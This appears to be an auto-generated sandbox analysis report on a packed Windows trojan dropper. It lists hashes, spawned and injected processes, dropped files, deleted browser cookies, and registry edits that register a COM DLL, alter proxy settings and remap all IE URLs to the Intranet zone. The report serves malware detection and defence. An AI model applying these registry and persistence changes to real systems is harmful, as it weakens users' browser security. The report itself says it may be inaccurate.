Trojan-Dropper.Win32.Exetemp.a (Kaspersky), Trojan.Generic.1630494 (B) (Emsisoft), Trojan.Generic.1630494 (AdAware), Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 416fdd6af6fefbc60fa55fd21e249d36
SHA1: 41a67db370b029d8ac6b7fc7e15e95884e8d0dfc
SHA256: 599e0d9dbb34ff79fe37ef23f8ee90947418a1c9e4539d0eb54dd5a1a1b10f08
SSDeep: 24576:nS4hIC6wCINBMChyMfcOswCINBMiPp70JZM9Xuqb:S4hI1wCqvuwCMGoXp
Size: 802816 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: Piriform Ltd
Created at: 2009-03-13 07:28:29
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
EXE_temp1.EXE:308
shock.exe:3516
taskkill.exe:1700
EXE_temp4.EXE:1516
ping.exe:1580
ping.exe:1416
svchots.exe:3760
EXE_temp2.exe:1176
huodongtongzhi.exe:1032
netsh.exe:3916
MiniIE.exe:3436
qtool.exe:3460
EXE_temp0.exe:980
wpzir.exe:3300
%original file name%.exe:1040
The Trojan injects its code into the following process(es):
acsvc.exe:2168
dsau.exe:3672
objs.exe:3332
EXE_temp3.exe:816
Explorer.EXE:1752
File activity
The process EXE_temp1.EXE:308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (48 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (0 bytes)
The process shock.exe:3516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\JMt\sys32\shock_new.dat0 (54 bytes)
%WinDir%\JMt\sys32\shock_new.dat1 (3 bytes)
%WinDir%\JMt\sys32\shock.dll (845 bytes)
The Trojan deletes the following file(s):
%WinDir%\JMt\sys32\shock_new.dat0 (0 bytes)
%WinDir%\JMt\sys32\shock_new.dat1 (0 bytes)
The process EXE_temp4.EXE:1516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (55 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (0 bytes)
The process dsau.exe:3672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Lkcjzquw.exe (3511647 bytes)
The process objs.exe:3332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\b54815b87c96d562a1e3eb3a6f418[1].gif (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\aaf38b09fdfe9c4d8687973dec764[1].gif (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[2].css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[2].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (0 bytes)
The process svchots.exe:3760 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\JMt\win32\DPro.sys (784 bytes)
%WinDir%\JMt\win32\reTcp.sys (196 bytes)
%WinDir%\JMt\win32\config.ini (46 bytes)
%WinDir%\JMt\win32\rename.exe (5480 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\_desktop.ie6[2].css (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@insurance[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\jquery.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\_desktop[2].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ya[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
The process EXE_temp3.exe:816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\mdhc\dsau.exe (1702 bytes)
%WinDir%\share\kbdf.dat (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~355ADAFA.ELOG (438554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~7AB73D6F.TMP (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~09E7FCEE.TMP (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~2D915D30.TMP (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~4BB0A38B.TMP (98 bytes)
%Documents and Settings%\%current user%\Desktop\Ê·ÉÃÂÂÃâ€â€ÃƒÆ’®Â¾Â¢Â±Â¬Ã“Î÷.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~5454C00A.TMP (827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~0169CD4B.TMP (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gjmxbvj.ico (388 bytes)
%WinDir%\share\ico.dll (129 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zeimroy.ico (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~7360087A.TMP (3835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarLhr\acsvc.exe (3838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ioergor.tmp (132 bytes)
%System%\DqKgbb.dll (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~25C6BFA8.TMP (163 bytes)
%Documents and Settings%\%current user%\Desktop\³ÉÈËÓÎ÷.lnk (1 bytes)
%WinDir%\share\rsvp\objs.exe (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~72A678D6.TMP (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe (1333 bytes)
The process EXE_temp0.exe:980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\JMt\wpzir.exe (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\iwvsbxk.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\itotzvy.txt (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\atxwrlr.txt (55 bytes)
%WinDir%\JMt\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\JMt\win32\svchots.txt (70868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uafuzsr.txt (2105 bytes)
%WinDir%\JMt\sys32\shock.txt (18796 bytes)
%WinDir%\JMt\sys32\whitelist.dat (2 bytes)
%WinDir%\JMt\sys32\qtool.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\efjtrit.txt (3 bytes)
%WinDir%\JMt\First.txt (6988 bytes)
%WinDir%\JMt\flist.bin (620 bytes)
%WinDir%\JMt\sys32\shock.exe (111 bytes)
%WinDir%\JMt\sys32\qtool.txt (26868 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%WinDir%\JMt\win32\svchots.exe (1695 bytes)
%WinDir%\JMt\MiniIE.txt (46228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sjapgfo.txt (3361 bytes)
%WinDir%\JMt\MiniIE.exe (272 bytes)
The process %original file name%.exe:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp2.exe (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp1.EXE (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp4.EXE (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp3.exe (673 bytes)
Registry activity
The process EXE_temp1.EXE:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 B1 8E 83 03 EA B0 A9 40 2D 40 80 F2 38 45 CE"
The process acsvc.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 D4 A2 C7 44 4E 3A 95 23 39 19 9A 8C 1F 71 56"
The process shock.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 8D 27 10 3A D1 0A 9E 75 2C 67 9B C0 85 4E 12"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"
[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"
[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\JMt\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\JMt\sys32\shock.dll"
[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"
[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"
[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\JMt\sys32\"
The process taskkill.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 F2 29 83 26 3E D9 3A D8 57 28 9C 5D DF 6D 16"
The process EXE_temp4.EXE:1516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 46 00 20 C6 30 FF 68 8D 7C 6C 4C C4 98 CF 4A"
The process ping.exe:1580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 56 22 5A 93 95 6F 20 42 74 37 F4 F1 21 18 88"
The process ping.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 B7 5D B6 17 80 23 9B 87 71 D4 34 94 5B 39 9E"
The process dsau.exe:3672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 92 00 A7 B7 49 39 EA 6E 35 EC 86 4B 06 44 38"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process objs.exe:3332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 DD A1 69 1E 03 0A F6 86 B4 8D E7 48 93 86 BA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process svchots.exe:3760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\JMt\win32\rename.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 4E 79 67 40 E8 4D C6 21 BD 03 61 D7 2D B9 1C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process EXE_temp2.exe:1176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 4B 50 9D 69 C3 68 4B 87 05 F1 33 7A D0 FE 69"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE -nohome"
The process huodongtongzhi.exe:1032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 4A 3F 34 3C F2 5F C9 19 43 A8 20 AA EC 77 D1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process netsh.exe:3916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
"WinSock 1.1 Provider Data" = "0E 10 00 00 11 00 00 00 14 00 00 00 14 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Tcpip]
"WinSock 2.0 Provider ID" = "A0 1A 0F E7 8B AB CF 11 8C A3 00 80 5F 48 A1 92"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
